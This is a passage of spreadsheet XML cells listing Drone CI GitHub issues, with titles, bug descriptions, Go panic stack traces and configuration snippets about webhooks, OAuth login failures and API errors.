handler.ServeHTTP(rw, req) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/net/http/server.go:1174 (0x412ae2e) (*conn).serve: serverHandler{c.server}.ServeHTTP(w, w.req) /usr/local/Cellar/go/1.3.2/libexec/src/pkg/runtime/proc.c:1445 (0x40d0620) goexit: runtimegoexit(void) </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/512</t>
  </si>
  <si>
    <t>[0.3] activate adding wrong hook url</t>
  </si>
  <si>
    <t>When I active a gitlab repo it sets up the deploy key and the webhook but it seems like the webhook is incorrect: `http://10.1.7.87/v1/hook/gitlab.com?owner=:owner&amp;name=:name` when it seems like it should be `http://10.1.7.87/api/hook/gitlab.com?owner=:owner&amp;name=:repo`</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/525</t>
  </si>
  <si>
    <t>exp not working after initial auth w/ github enterprise [0.3]</t>
  </si>
  <si>
    <t>After authorizing against github enterprise I am redirected to a blank page with the following log (with actual code and state of course)  2014/10/09 00:01:59.800599 [47744fe7df1d/brZBwyUGPx-000025] Started GET "/api/auth/enterprise.github.com?code=yyyy&amp;state=xxxx" from 10.0.2.2:63002 2014/10/09 00:01:59.800654 [47744fe7df1d/brZBwyUGPx-000025] Returning 400 in 37.051us  This looks like the same error I was receiving when trying to use 0.3 against github.com without a verified email. Is there something looking for specifically a verified email? /user/emails is sending back a valid email, but verified is set to false.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/557</t>
  </si>
  <si>
    <t>Logout functionality fails silently</t>
  </si>
  <si>
    <t>It's returning a 200 OK, but clicking logout loads this empty page (and doesn't clear session): ![image](https://cloud.githubusercontent.com/assets/2149341/4623449/2c1a6f3a-534f-11e4-94ea-02ae012c9c43.png)</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/637</t>
  </si>
  <si>
    <t>Team Settings, forbidden access?</t>
  </si>
  <si>
    <t>I just set up a fresh Drone.io instance and added a new team. At some point, when I clicked on "Team Settings" from the team-specific dashboard, I get a "Forbidden" message and a "400: Bad Request" response. This seemed to happen out of the blue. I installed Drone.io using a Docker container which I believe installs the latest version of Drone. Is there something that might cause this? Is there a way for me to delete the team given I no longer have access?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/639</t>
  </si>
  <si>
    <t>Params cannot contain the equals sign</t>
  </si>
  <si>
    <t>Because of https://github.com/drone/drone/blob/master/shared/build/script/script.go#L106 , seems you'll only get the portion of a param up until the = sign. Maybe something as simple as `strings.SplitN(env, "=", 2)` ?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/652</t>
  </si>
  <si>
    <t>Cannot add BitBucket repo in 0.3</t>
  </si>
  <si>
    <t>For some reason I can't add a BitBucket repo at all in 0.3. It pulls my repos fine and syncs them locally, but it doesn't actually add any hooks on BitBuckets side. When I click activate the spinning wheel runs, then disappears and no errors get printed out to `/var/log/upstart/drone.log` but I do get a 500 error upon adding it in the developer console.  POST https://drone.mooash.com/api/repos/bitbucket.org/Mooash/Testing 500 (Internal Server Error) angular.js:7991 (anonymous function) angular.js:7991 C angular.js:7813f angular.js:7547 C angular.js:10943 C angular.js:10943 (anonymous function) angular.js:11029 h.$eval angular.js:11949 h.$digest angular.js:11775 h.$apply angular.js:12055 (anonymous function) angular.js:17833 (anonymous function) angular.js:2612 q angular.js:309 Zc.c angular.js:2611  At first I thought it was due to my repo being called something with spaces so `%20` characters get printed in the URL.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/660</t>
  </si>
  <si>
    <t>Display login failure messages</t>
  </si>
  <si>
    <t>When using Drone with GitLab and using invalid credentials, the page shows a white screen. It would be helpful for the end user if there was an error message shown.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/738</t>
  </si>
  <si>
    <t>delete account - http 400</t>
  </si>
  <si>
    <t>I've setup Drone to sync against Bitbucket. When I click the main menu (top left) and select 'Users' I see a single user which is my Bitbucket account. When I click on that, I see on the user edit screen a button labelled 'Delete Account'. Clicking that results in a DELETE request to http://mydrone/api/users/bitbucket.org/&lt;user&gt; which returns HTTP 400 response. I'm guessing this is left-over code from when Drone supported local user accounts?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/779</t>
  </si>
  <si>
    <t>Wierd URL stuff</t>
  </si>
  <si>
    <t>If I go to http://drone.io/shadowfacts/EnFusion, everything works perfectly fine. But if I go to http://drone.io/shadowfacts/EnFusion/ I get a 404 page not found error. The second URL should work as well.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/809</t>
  </si>
  <si>
    <t>invalid character '&lt;' looking for beginning of value</t>
  </si>
  <si>
    <t>While trying to login using gitlab.com in drone, i get the following error  2015/01/13 14:32:18 invalid character '&lt;' looking for beginning of value  I launched drone this way  DRONE_SERVER_PORT=localhost:9876 DRONE_GITLAB_URL="http://gitlab.com" droned  i tried using the Dockerfile and also using the debian package on ubuntu14.04 . Btw i also tried to authenticate manually against https://gitlab.com/api/v3/session and it works, so it does not seems to be related to wrong credentials. Any ideas?</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/914</t>
  </si>
  <si>
    <t>Long commit message causes postgres insert error</t>
  </si>
  <si>
    <t>The postgres schema for commits uses VARCHAR(255) for the message. If the commit message exceeds this length, then an error occurs trying to commit the commit to the DB. By the way, the error handling in the hook handler leaves a lot to be desired. A lot of these 400s really should be 500s, and all of them discard the error string instead of logging or returning it, leaving us guessing as to the cause.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/937</t>
  </si>
  <si>
    <t>Cannot disable gitlab repo.</t>
  </si>
  <si>
    <t>I cannot disable any gitlab repo on my drone account:  drone disable git-server.de/nils/python-skeleton  does nothing, does not return anything, does not show any effect either. same with  drone delete git-server.de/nils/python-skeleton  however  drone status git-server.de/nils/python-skeleton  shows me the status of the last build.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/942</t>
  </si>
  <si>
    <t>Drone doesn't work with Gitlab 7.9+</t>
  </si>
  <si>
    <t>As @kowalczykp and others have noted on Gitter, Drone does not appear to work with the latest versions of Gitlab. Drone will issue a 400 Bad Request for all incoming webhooks. Manually verified with tcpflow on ubuntu. `tcpflow -p -c -i eth0 port 80` Seems to stem from the gitlab go library. https://github.com/Bugagazavr/go-gitlab-client/blob/master/hook_payload.go#L93 Indirectly the message reads. _"Invalid hook received, payload format not recognized."_</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/982</t>
  </si>
  <si>
    <t>nil pointer dereference on Rebuild</t>
  </si>
  <si>
    <t xml:space="preserve">Im running [Drone in a container](https://www.digitalocean.com/community/tutorials/how-to-perform-continuous-integration-testing-with-drone-io-on-coreos-and-docker) and I was having network issues so I was adding and removing the drone server. Got this after I clicked "Rebuild".  2015/04/18 09:37:27 http: panic serving 172.17.8.1:53133: runtime error: invalid memory address or nil pointer dereference goroutine 31 [running]: net/http.func011() /usr/local/go/src/pkg/net/http/server.go:1100 +0xb7 runtime.panic(0xb3afc0, 0x11ad913) /usr/local/go/src/pkg/runtime/panic.c:248 +0x18d github.com/drone/drone/server/handler.PostCommit(0xc2081815f0, 0xc2081812f0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/handler/commit.go:104 +0x5e3 github.com/zenazn/goji/web.handlerFuncWrap.ServeHTTPC(0xd52dd0, 0xc2081815f0, 0xc2081812f0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/handler.go:25 +0x54 github.com/zenazn/goji/web.(*router).route(0xc208028b28, 0xc2081dc630, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/router.go:119 +0x143 github.com/zenazn/goji/web.func002(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:88 +0x5f net/http.HandlerFunc.ServeHTTP(0xc2081c7900, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func005(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/repo.go:104 +0x45b net/http.HandlerFunc.ServeHTTP(0xc2081c7920, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func004(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/repo.go:62 +0x21d net/http.HandlerFunc.ServeHTTP(0xc2081c7940, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func003(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/repo.go:36 +0x5dc net/http.HandlerFunc.ServeHTTP(0xc2081c7960, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/zenazn/goji/web.(*cStack).ServeHTTPC(0xc2081dc630, 0xc2081815f0, 0xc2081812f0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:50 +0x69 github.com/zenazn/goji/web.(*Mux).ServeHTTPC(0xc208028af0, 0xc2081815f0, 0xc2081812f0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/mux.go:53 +0x73 github.com/zenazn/goji/web.(*router).route(0xc208028348, 0xc2081b76e0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/router.go:119 +0x143 github.com/zenazn/goji/web.func002(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:88 +0x5f net/http.HandlerFunc.ServeHTTP(0xc2081c7c40, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func006(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/user.go:21 +0x1a6 net/http.HandlerFunc.ServeHTTP(0xc2081c7c60, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func001(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/header.go:28 +0x4e9 net/http.HandlerFunc.ServeHTTP(0xc208176860, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 main.func002(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/main.go:176 +0x721 net/http.HandlerFunc.ServeHTTP(0xc2081c7c80, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func002(0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/drone/drone/server/middleware/options.go:22 +0x261 net/http.HandlerFunc.ServeHTTP(0xc208176890, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/zenazn/goji/web.(*cStack).ServeHTTP(0xc2081b76e0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:46 +0x7f github.com/zenazn/goji/web.(*Mux).ServeHTTP(0xc208028310, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /var/cache/drone/src/github.com/zenazn/goji/web/mux.go:45 +0x5f net/http.(*ServeMux).ServeHTTP(0xc208022930, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1511 +0x1a3 net/http.serverHandler.ServeHTTP(0xc2080059e0, 0x7fabe81609f0, 0xc2081b9400, 0xc2081f4c30) /usr/local/go/src/pkg/net/http/server.go:1673 +0x19f net/http.(*conn).serve(0xc208051100) /usr/local/go/src/pkg/net/http/server.go:1174 +0xa7e created by net/http.(*Server).Serve /usr/local/go/src/pkg/net/http/server.go:1721 +0x313 </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/983</t>
  </si>
  <si>
    <t>HTTP 400 Error While GitHub Authentication</t>
  </si>
  <si>
    <t>I'm getting error while trying to auth with GitHub. Actually this error same with Telmo's [problem](https://github.com/drone/drone/issues/679#issuecomment-68703200). But that issue closed without resolving problem.  [server] port=":8001"  [github] client="xxx" secret="yyy" orgs=[] open=true  ![image](https://cloud.githubusercontent.com/assets/782514/7216251/4bb27d2a-e601-11e4-971b-7da2973d0e1d.png) (of course using my real domain instead of _domain.com_) I'm following these steps and getting error : 1. Browsing to http://domain.com:8001/ 2. Clicking to GitHub button and redirected to Github.com 3. Allowing application and redirecting back to this url: `http://domain.com:8001/api/auth/github.com?code=62e5cb142fb19ad657b0&amp;state=I6MYHH2YJVHZWXWW44WNWM4DPOZPWCEKHH4BQHCIBQDG64ZX3AOQ%3D%3D%3D%3D` 4. But it's just a blank page. Here Chrome Console logs : ![image](https://cloud.githubusercontent.com/assets/782514/7216277/677c0c46-e602-11e4-8172-64663e915415.png)</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/993</t>
  </si>
  <si>
    <t>How to debug wsod on github/bitbucket authentication</t>
  </si>
  <si>
    <t>Have following the installation and configuration instructions carefully, but obviously something is not correct. Trying to login, but some github/bitbucket users just get stuck on wsod on the following urls: http://&lt;myhost&gt;/api/auth/github.com?code=12e561562e5126e5&amp;state=LAKSDJHLDGWSDFG672683F287G378HRU8HWFEHIUSFEHU9SEF%3D%3D%3D%3D http://&lt;myhost&gt;/api/auth/bitbucket.org?oauth_verifier=13123123123&amp;oauth_token=83f7g2873rfgh2f837 Just a white screen. 403 status code. No logging to syslog. Also found a comment on about drone from back in january stating https://www.digitalocean.com/community/tutorials/how-to-perform-continuous-integration-testing-with-drone-io-on-coreos-and-docker "This thing is useless. The github authentication is not working and there is no way to debug why is not working." Logging out from bitbucket/github and using some other users has worked, but for instance my personal github account has never worked. Please make it possible to know why it won't work.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1005</t>
  </si>
  <si>
    <t>Gitlab webhook calls fail due to "object_kind":"push"</t>
  </si>
  <si>
    <t>Gitlab 7.9 added a field `"object_kind":"push"` to the webhook POST body. Drone returns a 400 Bad Request with that property included, but succeeds if it's removed.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1022</t>
  </si>
  <si>
    <t>Update private repo params as structure JSON (not yaml string)</t>
  </si>
  <si>
    <t xml:space="preserve">Content of params (private variable) during update is expected yaml string format . It would be easier if params KVP can be accepted in json format. Below returns : 500 Internal Server Error  curl -v -X PUT "http://droneio.xyz.com/api/repos/github.com/npateriya/godemo?access_token=XYZ" -d `{params: { hello: world } }`  Yaml param for single variable works but not sure how to embed multiple KVP yaml in json.  curl -v -X PUT "http://droneio.xyz.com/api/repos/github.com/npateriya/godemo?access_token=XYZ" -d `{params: hello: world }` </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1086</t>
  </si>
  <si>
    <t>[Drone, Gitlab] "Activate Now" returns 500 Internal Server Error</t>
  </si>
  <si>
    <t>Gitlab version: 7.12.2 Steps: - Setup Drone in gitlab under applications  Name: Drone Callback URL: http://drone.[myserver].com/api/auth/gitlab.com  - Setup drone.yml with client and secret keys to talk to gitlab  [gitlab] url = "http://gitlab.[myserver].com" client = "exampleclientkey" secret = "examplesecretkey" skip_verify=false open=false  - Activate returns:  POST http://drone.[myserver].com/api/repos/gitlab.[myserver].com/user/test 500 (Internal Server Error)  Logs: - Nothing in the apache log for gitlab - Not sure where else to look Cheers</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1173</t>
  </si>
  <si>
    <t>Inconsistent use of `*_url` in JSON</t>
  </si>
  <si>
    <t>We currently have an inconsistent use of `_url` prefix in our JSON data. For example, we use `link_url` and `clone_url` in some cases, and use `avatar` instead of `avatar_url` in other cases. Avatar may be the only example, but we need to audit and fix so that we can finalize the REST api</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1183</t>
  </si>
  <si>
    <t>github auth defaulting to open</t>
  </si>
  <si>
    <t>Despite what the docs say, self registration is allowed unless I explicitly added `open=false` REMOTE_CONFIG="https://github.com?client_id=$CLIENT&amp;client_secret=$SECRET&amp;open=false"</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1184</t>
  </si>
  <si>
    <t>github `orgs` restriction not letting people in</t>
  </si>
  <si>
    <t>After disabling self-registration, I updated to  GITHUB_ORGS="ensime,fommil" REMOTE_CONFIG="https://github.com?client_id=$CLIENT&amp;client_secret=$SECRET&amp;orgs=$GITHUB_ORGS&amp;open=false"  (of which one is me and I am an owner of `ensime`) but when I log in, I see this  Login is restricted to approved organization members only  so I'm guessing org restriction is currently not working.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1190</t>
  </si>
  <si>
    <t>0.3 series stack traces when attempting to add a repository</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">The following is output when attempting to Add a repository from a fresh Drone-CI installation (via the .deb package) for the 0.3 series. This happens on any repository, so it doesn't appear to be triggered by existing configuration. 2015/09/05 23:48:06 http: panic serving 192.30.252.34:32556: runtime error: invalid memory address or nil pointer dereference goroutine 171 [running]: net/http.func011() /usr/local/go/src/pkg/net/http/server.go:1100 +0xb7 runtime.panic(0xb42de0, 0x11b98d3) /usr/local/go/src/pkg/runtime/panic.c:248 +0x18d github.com/drone/drone/server/handler.PostHook(0xc20894d9e0, 0xc20894d830, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/drone/drone/server/handler/hook.go:46 +0xfdb github.com/zenazn/goji/web.handlerFuncWrap.ServeHTTPC(0xd5d430, 0xc20894d9e0, 0xc20894d830, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/zenazn/goji/web/handler.go:25 +0x54 github.com/zenazn/goji/web.(_router).route(0xc208026348, 0xc2089bd260, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/zenazn/goji/web/router.go:119 +0x143 </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>github.com/zenazn/goji/web.func002(0x7f65f2564928</t>
    </r>
    <r>
      <rPr/>
      <t>, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:88 +0x5f net/http.HandlerFunc.ServeHTTP(0xc2089912c0, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func006(0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/drone/drone/server/middleware/user.go:21 +0x1a6 net/http.HandlerFunc.ServeHTTP(0xc2089912e0, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func001(0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/drone/drone/server/middleware/header.go:28 +0x4e9 net/http.HandlerFunc.ServeHTTP(0xc2081fb6a0, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 main.func002(0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/drone/drone/server/main.go:176 +0x721 net/http.HandlerFunc.ServeHTTP(0xc208991300, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/drone/drone/server/middleware.func002(0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/drone/drone/server/middleware/options.go:22 +0x261 net/http.HandlerFunc.ServeHTTP(0xc2081fb6d0, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1235 +0x40 github.com/zenazn/goji/web.(_cStack).ServeHTTP(0xc2089bd260, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/zenazn/goji/web/middleware.go:46 +0x7f github.com/zenazn/goji/web.(_Mux).ServeHTTP(0xc208026310, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /var/cache/drone/src/github.com/zenazn/goji/web/mux.go:45 +0x5f net/http.(_ServeMux).ServeHTTP(0xc208022930, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1511 +0x1a3 net/http.serverHandler.ServeHTTP(0xc208005a40, 0x7f65f2564928, 0xc20863d4a0, 0xc2083d68f0) /usr/local/go/src/pkg/net/http/server.go:1673 +0x19f net/http.(_conn).serve(0xc2089fad00) /usr/local/go/src/pkg/net/http/server.go:1174 +0xa7e created by net/http.(_Server).Serve /usr/local/go/src/pkg/net/http/server.go:1721 +0x313</t>
    </r>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1198</t>
  </si>
  <si>
    <t>Bug: Cannot delete repo through the API</t>
  </si>
  <si>
    <t xml:space="preserve">I can GET the repo using the API request and it seems to work fine. However, using the DELETE method it outputs the following stack trace:  2015/09/13 16:26:22 http: panic serving 80.200.141.199:53109: runtime error: invalid memory address or nil pointer dereference goroutine 653 [running]: net/http.func011() /usr/local/go/src/net/http/server.go:1130 +0xbb github.com/drone/drone/plugin/remote/github.DeleteKey(0xc208630a50, 0xc208357898, 0x7, 0xc2083578e0, 0xa, 0xc208309a60, 0x16, 0xc208126900, 0x17d, 0x0, ) /gopath/src/github.com/drone/drone/plugin/remote/github/helper.go:250 +0xfa github.com/drone/drone/plugin/remote/github.(*GitHub).Deactivate(0xc2080101c0, 0xc208630840, 0xc208196500, 0xc2085c0960, 0x55, 0x0, 0x0) /gopath/src/github.com/drone/drone/plugin/remote/github/github.go:207 +0x15f github.com/drone/drone/server/handler.DelRepo(0xc2086c70e0, 0xc2086c6f00, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/handler/repo.go:78 +0x8a5 github.com/zenazn/goji/web.handlerFuncWrap.ServeHTTPC(0xd81c90, 0xc2086c70e0, 0xc2086c6f00, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/handler.go:25 +0x55 github.com/zenazn/goji/web.(*router).route(0xc208010ab8, 0xc2086c7110, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/router.go:119 +0x144 github.com/zenazn/goji/web.func002(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/middleware.go:88 +0x60 net/http.HandlerFunc.ServeHTTP(0xc208309600, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func005(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/repo.go:104 +0x441 net/http.HandlerFunc.ServeHTTP(0xc208309620, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func004(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/repo.go:62 +0x21c net/http.HandlerFunc.ServeHTTP(0xc208309660, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func003(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/repo.go:36 +0x5ec net/http.HandlerFunc.ServeHTTP(0xc208309680, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/zenazn/goji/web.(*cStack).ServeHTTPC(0xc2086c7110, 0xc2086c70e0, 0xc2086c6f00, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/middleware.go:50 +0x91 github.com/zenazn/goji/web.(*Mux).ServeHTTPC(0xc208010a80, 0xc2086c70e0, 0xc2086c6f00, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/mux.go:53 +0x74 github.com/zenazn/goji/web.(*router).route(0xc2080103b8, 0xc2086c6ed0, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/router.go:119 +0x144 github.com/zenazn/goji/web.func002(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/middleware.go:88 +0x60 net/http.HandlerFunc.ServeHTTP(0xc2083090a0, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func006(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/user.go:21 +0x1b1 net/http.HandlerFunc.ServeHTTP(0xc2083090e0, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func001(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/header.go:28 +0x4cc net/http.HandlerFunc.ServeHTTP(0xc208356800, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 main.func002(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/main.go:176 +0x885 net/http.HandlerFunc.ServeHTTP(0xc208309120, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/drone/drone/server/middleware.func002(0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/drone/drone/server/middleware/options.go:22 +0x256 net/http.HandlerFunc.ServeHTTP(0xc208356830, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1265 +0x41 github.com/zenazn/goji/web.(*cStack).ServeHTTP(0xc2086c6ed0, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/middleware.go:46 +0x72 github.com/zenazn/goji/web.(*Mux).ServeHTTP(0xc208010380, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /gopath/src/github.com/zenazn/goji/web/mux.go:45 +0x60 net/http.(*ServeMux).ServeHTTP(0xc20803a960, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1541 +0x17d net/http.serverHandler.ServeHTTP(0xc20802f5c0, 0x7fdffec4afe8, 0xc208376960, 0xc20861eea0) /usr/local/go/src/net/http/server.go:1703 +0x19a net/http.(*conn).serve(0xc208058e60) /usr/local/go/src/net/http/server.go:1204 +0xb57 created by net/http.(*Server).Serve /usr/local/go/src/net/http/server.go:1751 +0x35e </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1217</t>
  </si>
  <si>
    <t>Missing webhooks when commit message is big</t>
  </si>
  <si>
    <t xml:space="preserve">I had to run this on drone 0.3 `alter table commits alter column commit_message type varchar;` the commit message was limited to 255 characters and it was causing missing webhooks.  2015/09/29 20:19:00 Unable to persist commit bbd96e4c1908177b81b4b3a8e77c3aaf8aea9974@develop. meddler.Insert: DB error in QueryRow: pq: value too long for type character varying(255) </t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1280</t>
  </si>
  <si>
    <t>Problem with BitBucket</t>
  </si>
  <si>
    <t>hi, wanted to try drone today in combination with BitBucket. Sadly did not have very much luck. Used the latest docker-container (0.4) and followed the instructions. First it seemed to work fine. After I pressed "Login" it displays me the repositories and when I then click on one, it tells me that it has to get activated first. So I press "Activate Now". That is when the problem starts. Because all I get then is the following error message:  Unable to activate this repository. You must have administrative access to this repository. Also, please check the third-party application access policy to ensure Drone is approved.  In the browser console I get:  http://localhost:8800/api/repos/janoberhauser/drone-test: Failed to load resource: the server responded with a status of 500 (Internal Server Error)  and in Docker:  Error #01: Bad request  To be sure I really gave it all the access-rights there are. So that can not be the issue. Also was I totally unable to find any kind of third-party application access policy in BitBucket. I guess that is only in GitHub. So anybody any idea what is going wrong. Is there maybe something wrong with the container because it is just 19h old. Thanks!</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1701</t>
  </si>
  <si>
    <t>[gogs] Incorrect resolution of relative "avatar_url"</t>
  </si>
  <si>
    <t>Drone is showing all broken images as avatars for repositories from Gogs source. I've seen it's due to relative URLs being found in "avatar_url" element of the `api/v1/orgs/orgname` endpoint, for example: `"avatar_url":"/gogs/avatars/6"` Drone is turning that into an url relative to the Drone url, not the Gogs url.</t>
  </si>
  <si>
    <t>https://github.com/harness/harness/issues/1775</t>
